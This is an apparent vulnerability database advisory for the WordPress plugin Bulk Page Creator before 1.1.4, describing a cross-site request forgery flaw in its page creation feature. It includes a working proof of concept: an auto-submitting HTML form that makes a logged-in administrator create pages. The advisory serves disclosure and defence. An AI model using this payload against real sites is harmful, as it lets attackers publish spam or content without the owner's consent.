WordPress Plugin Vulnerabilities
Bulk Page Creator < 1.1.4 - Arbitrary Page Creation via CSRF
Description
The plugin does not protect its page creation functionalities with nonce checks, which makes them vulnerable to CSRF.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=sc_bpc_page" method="POST"> <textarea name="sc-pages">0|-1|123| 1|-1|bbb| 2|-1|ccc| 3|-1|spam content| </textarea> <input type="text" name="pcontent" value="2"> <input type="text" name="posttype" value="publish"> <input type="text" name="sc-pages-content" value="some post content"> </form> <script> document.getElementById("test").submit(); </script>
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-09 (about 2 years ago)
Added
2022-05-09 (about 2 years ago)
Last Updated
2022-05-10 (about 2 years ago)